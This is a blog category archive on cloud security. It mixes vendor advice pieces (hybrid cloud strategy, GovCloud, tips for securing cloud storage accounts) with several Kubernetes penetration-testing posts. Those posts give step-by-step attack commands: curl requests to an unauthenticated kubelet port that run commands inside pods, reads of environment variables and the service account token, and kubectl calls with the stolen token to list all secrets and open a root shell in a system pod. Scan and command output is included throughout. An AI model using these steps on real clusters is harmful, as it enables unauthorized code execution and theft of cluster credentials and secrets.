Category Archives: cloud

Succeed in Your Cloud Migration With a Secure Hybrid Cloud Strategy

Picture this: An object storage misconfiguration has left thousands of customer records fully exposed. Your company is about to face costly compliance consequences and a loss of customer trust. How should you respond? More importantly, how could a secure hybrid cloud strategy have helped prevent such an incident from happening in the first place?

As IT teams face significant pressure to develop a successful cloud migration strategy, organizations are treating security as an afterthought in their rush to quickly move to the cloud. Today, 81 percent of organizations have a multicloud strategy, according to RightScale. Migration without cloud security services for visibility and governance can significantly increase the complexity, costs and risks of adoption.

In This Article

When Unsecure Cloud Migration Becomes Disastrous

Too often, security is forgotten in the excitement to capture the hybrid cloud’s remarkable potential. Perceptions that secure processes can slow digital transformation may lead to security being treated as an afterthought. While effectively managed cloud adoption can improve data security and disaster recovery, many organizations are wary of public cloud providers’ shared responsibility models with third-party security providers, which can increase the complexity for users and complicate processes for access and governing compliance compared to on-premises deployments. A Cybersecurity Insiders survey found that 43 percent of cloud adopters lack of visibility into infrastructure security, 38 percent report compliance troubles and 35 percent struggle to consistently enforce security policies.

Learn more about how to secure your hybrid cloud

Misconfigured cloud servers and other improperly configured systems were solely responsible for the exposure of 2 billion data records tracked by IBM X-Force researchers last year. In addition, inadvertent insider error has contributed to an over 400-percent year-over-year growth in cloud security risks, due in large part to misunderstandings about shared responsibility models to protect data in the cloud. Ultimately, if a data breach or disruption occurs, the organization is liable for the loss of customer trust, regulatory fines and other expensive consequences.

By rushing cloud adoption, business are more likely to generate risks than gain a competitive advantage. In fact, 74 percent of organizations reported that they likely experienced a data breach in the past year due to a lack of secure cloud migration processes. Secure cloud design, a full understanding of responsibility models and solutions for proactive risk management are critical to realizing cloud benefits.

How to Adopt Hybrid Cloud With Confidence

The organization’s ability to develop a successful cloud migration strategy depends, in part, on the IT team’s ability to effectively manage competing priorities of speed, cost efficiency and security. Across industries, hybrid cloud adoption is a necessary tool to balance expanding workloads and data assets. As cloud threats increase, managing hybrid cloud infrastructures requires the enterprise to develop new processes and adopt new solutions for visibility and control.

Strive for True Hybrid Cloud Visibility

Hybrid cloud environments can host a wide array of resources and application programming interfaces (APIs), which can make it challenging to orchestrate effective security controls.

The need for visibility necessitates management solutions designed to capture a diverse view of storage, networking and provisioning activities across public and private cloud environments. Cloud security services should offer visibility and analytics to proactively manage compliance, identify threats and accelerate remediation activities.

Proactively Manage the Cloud Life Cycle

Effective data governance in a hybrid cloud infrastructure requires comprehensive security policies that are proactively and consistently implemented across apps, services, databases, users and endpoints. Cloud security tools should support the organization’s transition to a DevSecOps model where security works alongside DevOps so that proper security controls are built into the design process from the beginning. In turn, this simplifies the process of access management, authentication and authorization in native and migrated cloud apps. To manage threats and compliance risks, organizations need solutions that automate policy enforcement and strengthen compliance posture in a hybrid cloud environment post-deployment.

Why the Enterprise Is Responsible for Protecting Customer Trust in the Hybrid Cloud

The revolution toward a digital economy is underway, and organizations recognize the potential of the hybrid cloud to introduce agility and scale. As IT teams face pressure to deploy a hybrid cloud infrastructure that supports digital transformation activities, many are rushing to the cloud without a comprehensive approach to protecting critical data by design and default.

To fully realize the potential benefits of the secure hybrid cloud, organizations must recognize and understand that the responsibility for protecting customer data and a secure move to the cloud continues to rest with their organization and IT teams. Implementing secure processes during migration and adoption can reduce the costs and risks that result from treating security as an afterthought. Cloud security services for visibility and orchestration are a necessity to proactively manage policy, compliance and access across cloud apps and services.

Learn more about how to secure your hybrid cloud

The post Succeed in Your Cloud Migration With a Secure Hybrid Cloud Strategy appeared first on Security Intelligence.

What is Amazon GovCloud?

Amazon GovCloud is an isolated Amazon Web Service (AWS) designed to allow customers and the U.S government agencies to move their confidential data into the cloud to address their compliance and specific regulatory requirements. It runs under ITAR, the U.S. International Traffic in Arms Regulations. With this cloud service, US citizens can run workloads that […]… Read More

The post What is Amazon GovCloud? appeared first on The State of Security.

Kubernetes: Kube-Hunter 10255

Below is some sample output that mainly is here to see what open 10255 will give you and look like.  What probably of most interest is the /pods endpoint




or the /metrics endpoint



or the /stats endpoint




$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 1.2.3.4    |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE              | LOCATION            | DESCRIPTION          |
+----------------------+---------------------+----------------------+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+----------------------+---------------------+----------------------+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster's     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {"etcdserver":"2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 |
|                     |                      | connection (HTTP)    | authorization and    | ...                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 |
|                     |                      |                      | give an attacker a   | ...                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod |
|                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node |
|                     |                      |                      | attacker cluster's   | ...                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe...          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec


kube-hunter output to get us started:

do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.

 Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.


We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:

KUBERNETES_PORT=tcp://10.10.10.10:443

or

KUBERNETES_MASTER_NAME: 10.11.12.13:443

Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them.  This may be (if we are lucky) another public IP or a 10. IP.  If it's a 10. IP we need to download kubectl to the pod.

Assuming it's not in the environment variables let's look and see if they are there in the mounted secrets

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

sample output truncated:
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.cert, namespace, and token

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y 
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

at this point you can pull secrets or exec into any available pods

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

to get a shell via kubectl

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system--server=https://1.2.3.4  --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces


Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.


Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.

# /run/%namespace%/%pod_name%/%container_name%

example:

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var


Here is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"

The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:

$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

or

$ curl --insecure  https://k8s-node-1:10250/runningpods | jq


Example 1:

curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)

Example 2:
curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Unauthorized

Example 3:

curl --insecure  https://1.2.3.4:10250/runningpods | jq


Output:

{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "kube-dns-5b8bf6c4f4-k5n2g",
        "generateName": "kube-dns-5b8bf6c4f4-",
        "namespace": "kube-system",
        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
        "uid": "63438841-e43c-11e8-a104-42010a80038e",
        "resourceVersion": "85366060",
        "creationTimestamp": "2018-11-09T16:27:44Z",
        "labels": {
          "k8s-app": "kube-dns",
          "pod-template-hash": "1646927090"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
          "kubernetes.io/config.source": "api",
          "scheduler.alpha.kubernetes.io/critical-pod": ""
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "kube-dns-5b8bf6c4f4",
            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
            "controller": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "kube-dns-config",
            "configMap": {
              "name": "kube-dns",
              "defaultMode": 420
            }
          },
          {
            "name": "kube-dns-token-xznw5",
            "secret": {
              "secretName": "kube-dns-token-xznw5",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "dnsmasq",
            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
            "args": [
              "-v=2",
              "-logtostderr",
              "-configDir=/etc/k8s/dns/dnsmasq-nanny",
              "-restartDnsmasq=true",
              "--",
              "-k",
              "--cache-size=1000",
              "--no-negcache",
              "--log-facility=-",
              "--server=/cluster.local/127.0.0.1#10053",
              "--server=/in-addr.arpa/127.0.0.1#10053",
              "--server=/ip6.arpa/127.0.0.1#10053"
            ],
            "ports": [
              {
                "name": "dns",
                "containerPort": 53,
                "protocol": "UDP"
              },
              {
                "name": "dns-tcp",
                "containerPort": 53,
                "protocol": "TCP"
              }
            ],
            "resources": {
              "requests": {
                "cpu": "150m",
                "memory": "20Mi"
              }
            },
            "volumeMounts": [
              {
                "name": "kube-dns-config",
                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
              },
              {
                "name": "kube-dns-token-xznw5",
                "readOnly": true,
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
              }
            ],
            "livenessProbe": {
              "httpGet": {
                "path": "/healthcheck/dnsmasq",
                "port": 10054,
                "scheme": "HTTP"
              },
              "initialDelaySeconds": 60,
              "timeoutSeconds": 5,
              "periodSeconds": 10,
              "successThreshold": 1,
              "failureThreshold": 5
            },
            "terminationMessagePath": "/dev/termination-log",
            "imagePullPolicy": "IfNotPresent"
          },
        --------SNIP---------

With the output of the running pods command you can craft your command to do the code exec

$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"

as an example:



leaves you with:

curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"

total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Kubernetes: List of ports

Other Kubernetes ports


What are some of the visible ports used in Kubernetes?

  • 44134/tcp - Helmtiller, weave, calico
  • 10250/tcp - kubelet (kublet exploit)
    • No authN, completely open
    • /pods
    • /runningpods
    • /containerLogs
  • 10255/tcp - kublet port (read-only)
    • /stats
    • /metrics
    • /pods
  • 4194/tcp - cAdvisor
  • 2379/tcp - etcd (see it on other ports though)
    • Etcd holds all the configs
    • Config storage
  • 30000 - dashboard
  • 443/6443 - api

How to secure your cloud file storage with 5 simple tricks

File hosting / cloud storage services today are a dime a dozen. Players in this vertical constantly top each other with free storage offerings, business features, and custom plans, all designed to cater to every possible audience. But they all have one thing in common: the cloud.

Cloud storage is somewhat of a double-edged sword: it’s a convenient way to keep your entire fleet of devices in sync, but it can also spell disaster if someone finds the keys to your vault. Remember the celebrity nudes leak a few years ago? Yeah. You don’t want that ‘fappening’ to you. So it’s a good idea to remind ourselves that cloud storage services like iCloud, Dropbox and Google Drive are not impenetrable. Your vendor can only do so much to protect you. ‘The Fappening’ was mostly the result of those celebrities falling victim to phishing emails. So it’s important to enable extra safeguards to avoid falling victim to scams that steal your password. In this guide, we’ll look at five practices to secure your cloud content and keep your digital life away from prying eyes.

Step 1 – Verify your email and/or phone number

This may draw a resounding “d’oooh” from power users, but you’d be surprised how many people forget their login credentials, especially those who aren’t online 24/7. Checking and confirming your email address with your vendor also helps you recover a forgotten password, so consider this simple step a double-whammy. Most cloud services also let you change the email associated with your account so, if you want to start anew, look for the module that lets you tweak this setting. It’s typically located under “account settings” or “security.”

Dropbox offers the option to quickly change the email associated with your account

If you have a phone number associated with your account, verify that one as well, and remember to update it if you end up changing your number for any reason. It ensures you’re always reachable on another device for two-factor authentication, important notifications that may involve security matters, and other exceptional situations.

Step 2 – Review, add, or remove devices, browsers and linked apps

Most cloud services offer a handy list of all devices linked to your account. If you’re a longtime user, chances are you’ve swapped devices a few times over the years. So, don’t be surprised if the list names a Windows Vista machine, or your old BlackBerry Bold. While vendors do their best to monitor your account for suspicious activity, it’s a good idea to unlink any old devices you no longer use. The same goes for different web browsers associated with your account, or linked apps that integrate with the service. If you no longer use those apps, there’s no reason for your account to keep ties with them. Who’s to say they don’t suffer a breach one day and leak your credentials?

Devices associated with a Google Drive account
This is how iCloud displays your devices. Simply click on the device’s name for more options to manage them, including to disassociate one or more with your account (for example, if you’ve sold your phone to someone).
An example of linked apps in Dropbox

Step 3 – enable two-factor-authentication (2FA)

Two-factor-authentication, typically abbreviated as 2FA, adds another layer of security to your online accounts. It allows the service to verify that the person logging in is really you by asking you to confirm a code on another device that you own. Wonder when this comes in handy? The 2014 iCloud hack could have been almost entirely avoided had those celebs used 2FA.

So be sure to flip this switch on for every online service you have an account with, especially your cloud storage services. Most vendors today offer this option, and some even have it on by default. But for those services that don’t have 2FA enabled from the start, be sure to dig through the settings and turn it on. It’s a life saver!

iCloud asks to check your phone for a six-digit passcode

Step 4 – have good password hygiene

Yes, it’s a drag, but you should still do it. Data breaches are so common these days that it’s become a matter of when, not if, one of your online accounts gets compromised. And cloud accounts are easily the most sensitive ones. It’s also wise to use a strong password when you decide to change it. Use a combination of upper- and lower-case letters, numbers, as well as special characters (#$%*). And remember, eight characters is the absolute minimum by today’s standards.

If you don’t trust your memory with such a complex string of characters, perhaps it’s time you considered using a password manager. There’s no shortage of options out there. Plus, it’s advisable to use different passwords with different online accounts, in case your credentials end up for sale on the dark web following a breach.

Microsoft even offers a way to go password-less with its OneDrive file-hosting service. All you need to do is download the Authenticator app for iOS or Android. “It’s more convenient and more secure,” according to the software giant. OneDrive users can also tick a box and have Microsoft remind them to change their password once every 72 days.

Changing a password in OneDrive. Microsoft offers tips on how to set a strong password, as well as the option to get nagged from time to time to change it.

Step 5 – Always sign out!

The exclamation mark above is easily justified. ALWAYS sign out of your account when you access your file storage service in a web browser, especially on an external device. For instance, Dropbox stays logged in forever, even after you close the tab in your browser – a big oversight on behalf of a service with more than 500 million users. Nevertheless, end-users shoulder the responsibility of keeping their accounts secure. If someone else has access to your computer, whether at home or at work, they can easily peek into your private life with a few keystrokes and clicks. Maybe you have nothing to hide, but why would want someone peeking at your photos without you knowing? So remember to always hit that “sign out” button when you’re done.

Stay safe

These are just a few simple tricks to help you keep your digital life safe. We could mention other things as well, like choosing security questions and answers that can’t be easily guessed (for password recovery), or keeping an eye out for phishing scams that impersonate your cloud vendor. But as a rule of thumb, these five tips are all you need to stay on the safe side.

The folks at Apple prefer to keep iCloud users away from the technicalities and randomly trigger two-factor-authentication every now and then to verify that no one has hijacked your account. They even show you how to avoid phishing emails and other scams so you don’t mistakenly give someone the keys to your iCloud. Dropbox has a comprehensive security checkup module that lets you do most of the above in one shot. And Google and Microsoft offer handy “Authenticator” apps with their respective services (Google Drive and One Drive).

While businesses may be reluctant to store their intellectual property on remote servers, public clouds are nonetheless a decent option for regular users. So go ahead and apply these five tricks to your preferred cloud storage app or service. You’ll be glad you did. Stay safe out there!

Kubernetes: Kubernetes Dashboard


Tesla was famously hacked for leaving this open and it's pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+-----------------------+---------------+----------------------+----------------------+------------------+
| LOCATION              | CATEGORY      | VULNERABILITY        | DESCRIPTION          | EVIDENCE         |
+-----------------------+---------------+----------------------+----------------------+------------------+
| 1.2.3.4:30000         | Remote Code   | Dashboard Exposed    | All oprations on the | nodes: pach-okta |
|                       | Execution     |                      | cluster are exposed  |                  |
+-----------------------+---------------+----------------------+----------------------+------------------+

Why do you care?  It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like:
viewing secrets



utilization



logs

shells

Kubernetes: Kubelet API containerLogs endpoint


How to get the info that kube-hunter reports for open /containerLogs endpoint



Vulnerabilities
+---------------+-------------+------------------+----------------------+----------------+
| LOCATION       CATEGORY     | VULNERABILITY    | DESCRIPTION          | EVIDENCE       |
+---------------+-------------+------------------+----------------------+----------------+
+----------------+------------+------------------+----------------------+----------------+
| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a   |                |
|               | Disclosure  | Logs             | running container    |                |
|               |             |                  | are using the        |                |
|               |             |                  | exposed              |                |
|               |             |                  | /containerLogs       |                |
